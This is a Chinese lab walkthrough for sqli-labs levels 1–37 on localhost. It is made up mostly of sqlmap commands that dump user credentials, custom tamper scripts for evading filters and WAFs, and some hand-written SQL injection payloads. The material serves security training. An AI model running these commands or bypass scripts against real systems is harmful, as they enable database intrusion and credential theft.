【sqlmap】sqli-labs速通攻略

news2024/11/25 3:03:43

sqli-labs工具速通

Less-1

sqlmap -u http://127.0.0.1:8081/Less-1/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-1/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-1/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-1/?id=1 --batch -D security -T users -C username,password --dump

Less-2

sqlmap -u http://127.0.0.1:8081/Less-2/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-2/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-2/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-2/?id=1 --batch -D security -T users -C username,password --dump

Less-3

sqlmap -u http://127.0.0.1:8081/Less-3/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-3/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-3/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-3/?id=1 --batch -D security -T users -C username,password --dump

Less-4

sqlmap -u http://127.0.0.1:8081/Less-4/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-4/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-4/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-4/?id=1 --batch -D security -T users -C username,password --dump

Less-5

sqlmap -u http://127.0.0.1:8081/Less-5/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-5/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-5/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-5/?id=1 --batch -D security -T users -C username,password --dump

Less-6

sqlmap -u http://127.0.0.1:8081/Less-6/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-6/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-6/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-6/?id=1 --batch -D security -T users -C username,password --dump

Less-7

sqlmap -u http://127.0.0.1:8081/Less-7/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-7/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-7/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-7/?id=1 --batch -D security -T users -C username,password --dump

Less-8

sqlmap -u http://127.0.0.1:8081/Less-8/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-8/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-8/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-8/?id=1 --batch -D security -T users -C username,password --dump

Less-9

sqlmap -u http://127.0.0.1:8081/Less-9/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-9/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-9/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-9/?id=1 --batch -D security -T users -C username,password --dump

Less-10

sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch -D security -T users -C username,password --dump

如果注不进入就把level提升到5,risk提升到2

sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch --dbs --level=5 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch -D security --tables --level=5 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch -D security -T users --columns --level=5 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch -D security -T users -C username,password --dump --level=5 --risk=2

Less-11

sqlmap -u http://127.0.0.1:8081/Less-11/ --batch --data="uname=admin&passwd=123&submit=Submit" --dbs
sqlmap -u http://127.0.0.1:8081/Less-11/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-11/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-11/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users -C username,password --dump

Less-12

sqlmap -u http://127.0.0.1:8081/Less-12/ --batch --data="uname=admin&passwd=123&submit=Submit" --dbs
sqlmap -u http://127.0.0.1:8081/Less-12/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-12/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-12/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users -C username,password --dump

Less-13

sqlmap -u http://127.0.0.1:8081/Less-13/ --batch --data="uname=admin&passwd=123&submit=Submit" --dbs
sqlmap -u http://127.0.0.1:8081/Less-13/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-13/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-13/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users -C username,password --dump

Less-14

sqlmap -u http://127.0.0.1:8081/Less-14/ --batch --data="uname=admin&passwd=123&submit=Submit" --dbs
sqlmap -u http://127.0.0.1:8081/Less-14/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-14/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-14/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users -C username,password --dump

Less-15

sqlmap -u http://127.0.0.1:8081/Less-15/ --batch --data="uname=admin&passwd=123&submit=Submit" --dbs
sqlmap -u http://127.0.0.1:8081/Less-15/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-15/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-15/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users -C username,password --dump

Less-16

sqlmap -u http://127.0.0.1:8081/Less-16/ --batch --data="uname=admin&passwd=123&submit=Submit" --level=4 --dbs
sqlmap -u http://127.0.0.1:8081/Less-16/ --batch --data="uname=admin&passwd=123&submit=Submit" --level=4 -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-16/ --batch --data="uname=admin&passwd=123&submit=Submit" --level=4 -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-16/ --batch --data="uname=admin&passwd=123&submit=Submit" --level=4 -D security -T users -C username,password --dump

Less-17

sqlmap -u http://127.0.0.1:8081/Less-17/ --batch --data="uname=admin&passwd=123&submit=Submit" --dbs
sqlmap -u http://127.0.0.1:8081/Less-17/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-17/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-17/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users -C username,password --dump

注意,因为该接口本身就是会对数据做更新的,因此使用sqlmap注入会导致数据被更新,密码会变为1

Less-18

sqlmap -u http://127.0.0.1:8081/Less-18/ --batch --data="uname=admin&passwd=admin&submit=Submit" --dbs --level=3
sqlmap -u http://127.0.0.1:8081/Less-18/ --batch --data="uname=admin&passwd=admin&submit=Submit" -D security --tables --level=3
sqlmap -u http://127.0.0.1:8081/Less-18/ --batch --data="uname=admin&passwd=admin&submit=Submit" -D security -T users --columns --level=3
sqlmap -u http://127.0.0.1:8081/Less-18/ --batch --data="uname=admin&passwd=admin&submit=Submit" -D security -T users -C username,password --dump --level=3

Less-19

sqlmap -u http://127.0.0.1:8081/Less-19/ --batch --data="uname=admin&passwd=admin&submit=Submit" --dbs --level=3
sqlmap -u http://127.0.0.1:8081/Less-19/ --batch --data="uname=admin&passwd=admin&submit=Submit" -D security --tables --level=3
sqlmap -u http://127.0.0.1:8081/Less-19/ --batch --data="uname=admin&passwd=admin&submit=Submit" -D security -T users --columns --level=3
sqlmap -u http://127.0.0.1:8081/Less-19/ --batch --data="uname=admin&passwd=admin&submit=Submit" -D security -T users -C username,password --dump --level=3

Less-20

sqlmap -u http://127.0.0.1:8081/Less-20/ --batch --cookie="uname=admin" --dbs --level=2
sqlmap -u http://127.0.0.1:8081/Less-20/ --batch --cookie="uname=admin" -D security --tables --level=3
sqlmap -u http://127.0.0.1:8081/Less-20/ --batch --cookie="uname=admin" -D security -T users --columns --level=3
sqlmap -u http://127.0.0.1:8081/Less-20/ --batch --cookie="uname=admin" -D security -T users -C username,password --dump --level=3

Less-21

发现cookie是admin=YWRtaW4=,也就是cookie的值进行了base64编码,需要使用–tamper指定base64编码处理

sqlmap -u http://127.0.0.1:8081/Less-21/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 --dbs
sqlmap -u http://127.0.0.1:8081/Less-21/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-21/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-21/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 -D security -T users -C username,password --dump

Less-22

类似Less-21

sqlmap -u http://127.0.0.1:8081/Less-22/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 --dbs
sqlmap -u http://127.0.0.1:8081/Less-22/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-22/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-22/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 -D security -T users -C username,password --dump

Less-23

sqlmap -u http://127.0.0.1:8081/Less-23/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-23/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-23/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-23/?id=1 --batch -D security -T users -C username,password --dump

Less-24

二次注入,不适用sqlmap

Less-25

需要绕过and or过滤,可以使用双写的方式绕过

sqlmap -u http://127.0.0.1:8081/Less-25/?id=1 --batch --tamper=doubleandor.py --dbs
sqlmap -u http://127.0.0.1:8081/Less-25/?id=1 --batch --tamper=doubleandor.py -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-25/?id=1 --batch --tamper=doubleandor.py -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-25/?id=1 --batch --tamper=doubleandor.py -D security -T users -C username,password --dump

"""
doubleandor.py
"""
#!/usr/bin/env python

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)

    >>> tamper("1 AND '1'='1")
    "1 %26%26 '1'='1"
    """

    retVal = payload

    if payload:
        retVal = retVal.replace("and","anandd").replace("or","oorr").replace("AND","ANANDD").replace("OR","OORR")

    return retVal

Less-26

本题除了过滤了and or外,空格和#也被过滤。and和or用双写绕过,空格用%a0绕过,#用 and '1闭合语句进行绕过

基本的payload如下

?id=1'%a0anandd%a0extractvalue(1,concat(0x7e,(select%a0database()),0x7e))%a0anandd'1

我们可以使用自定义的脚本替换字符进行绕过,让sqlmap帮我们注入:

sqlmap -u http://127.0.0.1:8081/Less-26/?id=1 --batch --tamper=hash2close,space2a0,doubleandor --dbs
sqlmap -u http://127.0.0.1:8081/Less-26/?id=1 --batch --tamper=hash2close,space2a0,doubleandor -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-26/?id=1 --batch --tamper=hash2close,space2a0,doubleandor -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-26/?id=1 --batch --tamper=hash2close,space2a0,doubleandor -D security -T users -C username,password --dump

ps:由于sqlmap生成的payload太长,暴字段和值的时候可能会有问题,暴值的时候可以一个字段一个字段注

  • hash2close.py:将#替换为 and '1进行标签闭合

    #!/usr/bin/env python

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    >>> tamper("1#")
    "1 AND '1'='1"
    """

    retVal = payload
    if not payload:
        return payload
    
    retVal = retVal.replace("#"," and '1' = '1")

    return retVal

  • space2a0.py:将空格替换为%a0

    #!/usr/bin/env python

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    >>> tamper("1 and 1")
    "1%a0and%a01"
    """

    retVal = payload
    if not payload:
        return payload
    
    retVal = retVal.replace(" ", "%a0")

    return retVal

  • doubleandor.py:将and、or进行双写

    #!/usr/bin/env python

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    >>> tamper("1 AND '1'='1")
    "1 ANANDD '1'='1"
    """

    retVal = payload

    if payload:
        retVal = re.sub(r"(?i)\bAND\b", "ANANDD", re.sub(r"(?i)\bOR\b", "OORR", payload))

    return retVal

Less-27

由于页面返回自带Hint的原因,sqlmap无法识别并进行处理。

这一题过滤了union和select,使用报错注入

sqlmap -u http://127.0.0.1:8081/Less-27/?id=1 --batch --tamper=hash2close,space2a0,tripleselect --dbs
sqlmap -u http://127.0.0.1:8081/Less-27/?id=1 --batch --tamper=hash2close,space2a0,tripleselect -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-27/?id=1 --batch --tamper=hash2close,space2a0,tripleselect -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-27/?id=1 --batch --tamper=hash2close,space2a0,tripleselect -D security -T users -C username --dump
sqlmap -u http://127.0.0.1:8081/Less-27/?id=1 --batch --tamper=hash2close,space2a0,tripleselect -D security -T users -C password --dump

hash2close,space2a0见Less-26

tripleselect.py:三写绕过select

#!/usr/bin/env python

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    >>> tamper("select")
    "selselecselecttect"
    """

    retVal = payload
    if not payload:
        return payload
    
    retVal = re.sub(r"(?i)select", "selselecselecttect", retVal)

    return retVal

Less-28

在这里插入图片描述

在这里插入图片描述

  • 因为注释符号--#被过滤了,因此需要使用语句闭合末尾处。由于整个查询在括号内,因此闭合时需要注意加上括号,在末尾使用and ('1闭合。或者使用;%00也可以,其中%00是截断符号
  • union select被过滤了,可以使用unionunion select select或者使用union all select,sqlmap自带了union all select,因此不需要设置
  • 空格可以使用%0a或者%a0替换
?id=9999')%0aunionunion%0aselect%0aselect%0a1,database(),version();%00

?id=9999')%0aunionunion%0aselect%0aselect%0a1,group_concat(0x7e,%0atable_name,%0a0x7e),3%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database();%00

?id=9999')%0aunionunion%0aselect%0aselect%0a1,group_concat(0x7e,%0acolumn_name,%0a0x7e),3%0afrom%0ainformation_schema.columns%0awhere%0atable_schema=database()%0aand%0atable_name='users';%00

?id=9999')%0aunionunion%0aselect%0aselect%0a1,group_concat(username),group_concat(password)%0afrom%0ausers;%00

sqlmap:

sqlmap -u http://127.0.0.1:8081/Less-28/?id=1 --batch --tamper=comment2truncate,space2a0 --risk=2 --dbs
sqlmap -u http://127.0.0.1:8081/Less-28/?id=1 --batch --tamper=comment2truncate,space2a0 --risk=2  -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-28/?id=1 --batch --tamper=comment2truncate,space2a0 --risk=2  -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-28/?id=1 --batch --tamper=comment2truncate,space2a0 --risk=2  -D security -T users -C username --dump
sqlmap -u http://127.0.0.1:8081/Less-28/?id=1 --batch --tamper=comment2truncate,space2a0 --risk=2  -D security -T users -C password --dump

"""
comment2truncate.py
"""
#!/usr/bin/env python

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    >>> tamper("1#")
    "1;%00"
    >>> tamper("1--")
    "1;%00"
    """

    retVal = payload
    if not payload:
        return payload
    
    retVal = retVal.replace("#",";%00").replace("--",";%00")


    return retVal

space2a0见Less-26

ps:爆表字段可能存在使用工具会爆破失败的情况

Less-29

使用WAF进行了过滤,直接运行程序即可

sqlmap -u http://127.0.0.1:8081/Less-29/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-29/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-29/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-29/?id=1 --batch -D security -T users -C username,password --dump

Less-30

使用WAF进行了过滤,直接运行程序即可

sqlmap -u http://127.0.0.1:8081/Less-30/?id=1 --batch --dbs --level=2 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-30/?id=1 --batch -D security --tables --level=2 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-30/?id=1 --batch -D security -T users --columns --level=2 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-30/?id=1 --batch -D security -T users -C username,password --dump --level=2 --risk=2

Less-31

使用WAF进行了过滤,直接运行程序即可

sqlmap -u http://127.0.0.1:8081/Less-31/?id=1 --batch --dbs --level=2 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-31/?id=1 --batch -D security --tables --level=2 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-31/?id=1 --batch -D security -T users --columns --level=2 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-31/?id=1 --batch -D security -T users -C username,password --dump --level=2 --risk=2

Less-32

宽字节注入

sqlmap -u http://127.0.0.1:8081/Less-32/?id=1 --batch --tamper=unmagicquotes --dbs
sqlmap -u http://127.0.0.1:8081/Less-32/?id=1 --batch --tamper=unmagicquotes -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-32/?id=1 --batch --tamper=unmagicquotes -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-32/?id=1 --batch --tamper=unmagicquotes -D security -T users -C username,password --dump

Less-33

宽字节注入

sqlmap -u http://127.0.0.1:8081/Less-33/?id=1 --batch --tamper=unmagicquotes --dbs
sqlmap -u http://127.0.0.1:8081/Less-33/?id=1 --batch --tamper=unmagicquotes -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-33/?id=1 --batch --tamper=unmagicquotes -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-33/?id=1 --batch --tamper=unmagicquotes -D security -T users -C username,password --dump

Less-34

宽字节注入,只不过换成了POST方法

sqlmap -u http://127.0.0.1:8081/Less-34/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes --dbs
sqlmap -u http://127.0.0.1:8081/Less-34/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-34/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-34/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes -D security -T users -C username,password --dump

Less-35

使用了addSlashes()函数转义,正常会想到宽字节,但是此题是数字型,非引号类型注入,因此直接注就行

sqlmap -u http://127.0.0.1:8081/Less-35/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-35/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-35/?id=1 --batch  -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-35/?id=1 --batch  -D security -T users -C username,password --dump

Less-36

转义的字符更多了,但宽字符注入仍有效

sqlmap -u http://127.0.0.1:8081/Less-36/?id=1 --batch --tamper=unmagicquotes --dbs
sqlmap -u http://127.0.0.1:8081/Less-36/?id=1 --batch --tamper=unmagicquotes -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-36/?id=1 --batch --tamper=unmagicquotes -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-36/?id=1 --batch --tamper=unmagicquotes -D security -T users -C username,password --dump

Less-37

类似Less-36,换成了POST方法

sqlmap -u http://127.0.0.1:8081/Less-37/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes --dbs
sqlmap -u http://127.0.0.1:8081/Less-37/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-37/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-37/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes -D security -T users -C username,password --dump

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2195413.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

购物清单 | 双十一加购率最高好物合集,数码购物车必备!

购物清单 | 双十一加购率最高好物合集,数码购物车必备!

​双十一来临,小伙伴们肯定已经被种草了很多很多清单,开始买买买了!但是,作为一个数码博主,怎么能少了数码产品!今天我给大家准备了一份数码人专属的购物清单,快来看看吧! 运动耳机…
阅读更多...
[水墨:创作周年纪念] 特别篇!

[水墨:创作周年纪念] 特别篇!

本篇是特别篇!! 个人主页水墨不写bug // _ooOoo_ // // o8888888o // // 88" . "88 …
阅读更多...
如何方便地打出「」和『』

如何方便地打出「」和『』

比起英文中的引号 ‘’和 “”,我更喜欢使用中文直角引号:「」和 『』。 此外,在港澳台、日本这几个地区中,就经常使用『』和「」: ​ ‍ 注意:不同地区的习惯可能有所不同。在汉语中『』、「」分别为双…
阅读更多...
数学公式编辑器免费版下载,mathtype和latex哪个好用

数学公式编辑器免费版下载,mathtype和latex哪个好用

选择适合自己的公式编辑器需要考虑多个因素。首先,您需要确定编辑器支持的功能和格式是否符合您的需求,例如是否可以插入图片、导出各种文件格式等。其次,您可以考虑编辑器的易用性和界面设计是否符合您的个人喜好。另外,您还可以…
阅读更多...
面向对象特性中 继承详解

面向对象特性中 继承详解

目录 概念: 定义: 定义格式 继承关系和访问限定符 基类和派生类对象赋值转换: 继承中的作用域: 派生类的默认成员函数 继承与友元: 继承与静态成员: 复杂的菱形继承及菱形虚拟继承: 虚…
阅读更多...
手机号归属地查询-手机号归属地-手机号归属地-运营商归属地查询-手机号码归属地查询手机号归属地-运营商归属地

手机号归属地查询-手机号归属地-手机号归属地-运营商归属地查询-手机号码归属地查询手机号归属地-运营商归属地

手机号归属地查询API接口是一种网络服务接口,允许开发者通过编程方式查询手机号码的注册地信息。关于快证签API接口提供的手机号归属地查询服务,以下是一些关键信息: 一、快证签API接口简介 快证签API接口可能是一个提供多种验证和查询服务…
阅读更多...
「自动化测试」Selenium 的使用

「自动化测试」Selenium 的使用

使用 Selenium 需要先导入相关依赖 <dependency> <groupId>org.seleniumhq.selenium</groupId> <artifactId>selenium-java</artifactId> <version>4.0.0</version> </dependency><dependency><groupId>io.gith…
阅读更多...
免费录屏神器!这四款软件让你快捷录屏~

免费录屏神器!这四款软件让你快捷录屏~

随着技术的进步&#xff0c;免费的录屏软件如雨后春笋般涌现&#xff0c;为我们的工作、学习和娱乐提供了极大的便利。今天&#xff0c;就让我来为大家推荐几款备受好评的免费录屏软件&#xff0c;并分享一下使用感受吧&#xff01; 一、福昕录屏 直通车&#xff08;粘贴到浏览…
阅读更多...
OJ在线评测系统 微服务高级 Gateway网关接口路由和聚合文档 引入knife4j库集中查看管理并且调试网关项目

OJ在线评测系统 微服务高级 Gateway网关接口路由和聚合文档 引入knife4j库集中查看管理并且调试网关项目

Gateway微服务网关接口路由 各个服务之间已经能相互调用了 为什么需要网关 因为我们的不同服务是放在不同的端口上面的 如果前端调用服务 需要不同的端口 8101 8102 8103 8104 我们最好提供一个唯一的 给前端去调用的路径 我们学习技术的时候必须要去思考 1.为什么要用&am…
阅读更多...
回溯算法:一个模板解决排列组合问题

回溯算法:一个模板解决排列组合问题

回溯算法 在初遇排列组合题目时&#xff0c;总让人摸不着头脑&#xff0c;但是当我做了很多题目后&#xff0c;发现几乎能用同一个模板做完所有这种类型的题目&#xff0c;大大提高了解题效率。回溯是递归的副产品&#xff0c;只要有递归就会有回溯。 回溯法很难&#xff0c;…
阅读更多...
77寸OLED透明触摸屏有哪些应用场景

77寸OLED透明触摸屏有哪些应用场景

说到77寸OLED透明触摸屏&#xff0c;那可真是市场营销中的一大亮点&#xff0c;应用场景多到数不清&#xff01;我这就给你细数几个热门的&#xff1a; 商业展示&#xff1a;这可是77寸OLED透明触摸屏的拿手好戏&#xff01;在高端零售店铺里&#xff0c;它可以作为陈列窗口&am…
阅读更多...
yolov测试各项指标的流程

yolov测试各项指标的流程

# yolov测试各项指标的流程: 载入模型, 其中包括类别数等; 按照 batch_size 逐张图片进行预测 得到预测标签: predn 和 实际标签 labelsn, 其中 末尾的 n 表示经过了原图适配的 bbox坐标. predn: {tensor: (3,6)},表示预测到了3个标签, 表示[x1, y1, x2, y2, confidence, clas…
阅读更多...
IO重定向

IO重定向

文章目录 IO重定向概念3个标准文件描述符“最低可用文件描述符”原则 默认的连接&#xff1a;tty使用close then open将stdin定向到文件使用open..close..dup..close将stdin定向到文件使用open..dup2..close将stdin重定向到文件课上实验 IO重定向 大多数的程序不接收输出文件名…
阅读更多...
Deformable Transformer论文笔记

Deformable Transformer论文笔记

原文链接 [2010.04159] Deformable DETR: Deformable Transformers for End-to-End Object Detection (arxiv.org)https://arxiv.org/abs/2010.04159 原文笔记 What 作者结合了可变形卷积的稀疏空间采样和 Transformer 的关系建模能力的优点。提出了Deformable Detr Defor…
阅读更多...
算法笔记(十三)——BFS 解决最短路问题

算法笔记(十三)——BFS 解决最短路问题

文章目录 迷宫中离入口最近的出口最小基因变化单词接龙为高尔夫比赛砍树 BFS 解决最短路问题 BFS(广度优先搜索) 是解决最短路径问题的一种常见算法。在这种情况下&#xff0c;我们通常使用BFS来查找从一个起始点到目标点的最短路径。 迷宫中离入口最近的出口 题目&#xff1a;…
阅读更多...
can 总线入门———can简介硬件电路

can 总线入门———can简介硬件电路

文章目录 0. 前言1. CAN简介2. 主流通讯协议对比3. CAN 硬件电路4. CAN 电平标准5. CAN 收发器 0. 前言 博客内容来自B站上CAN总线入门教程视频讲解&#xff0c;博客中的插图和内容均为视频中的内容。视频链接 CAN总线入门教程 1. CAN简介 先来看看一它名字的意思&#xff0c…
阅读更多...
Redis 缓存策略详解:提升性能的四种常见模式

Redis 缓存策略详解:提升性能的四种常见模式

在现代分布式系统中&#xff0c;缓存是提升性能和减轻数据库负载的关键组件。Redis 作为一种高性能的内存数据库&#xff0c;被广泛应用于缓存层。本文将深入探讨几种常用的 Redis 缓存策略&#xff0c;包括旁路缓存模式&#xff08;Cache-Aside Pattern&#xff09;、读穿透模…
阅读更多...
强化学习入门到不想放弃-4

强化学习入门到不想放弃-4

上回的地址&#xff1a;强化学习入门到不想放弃-3 (qq.com) 上上回地址&#xff1a;强化学习入门到不想放弃-2 (qq.com) 上上上回地址&#xff1a;强化学习入门到不想放弃-1 (qq.com) 好久没更新了&#xff0c;也是不知道写啥啊&#xff0c;&#xff08;有些文章刚写了就被有些…
阅读更多...
鸽笼原理与递归 - 离散数学系列(四)

鸽笼原理与递归 - 离散数学系列(四)

目录 1. 鸽笼原理 鸽笼原理的定义 鸽笼原理的示例 鸽笼原理的应用 2. 递归的定义与应用 什么是递归&#xff1f; 递归的示例 递归与迭代的对比 3. 实际应用 鸽笼原理的实际应用 递归的实际应用 4. 例题与练习 例题1&#xff1a;鸽笼原理应用 例题2&#xff1a;递归…
阅读更多...
三、Python基础语法(注释、三种波浪线、变量)

三、Python基础语法(注释、三种波浪线、变量)

一、注释 注释是对代码进行解释说明的文字&#xff0c;不会被解释器执行&#xff0c;可以更方便阅读代码和了解代码的作用。 1.单行注释 使用#开头的文字就是注释&#xff0c;可以使用快捷键Ctrl / 2.多行注释 多行注释就是注释的内容&#xff0c;可以换行书写&#xff0c…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023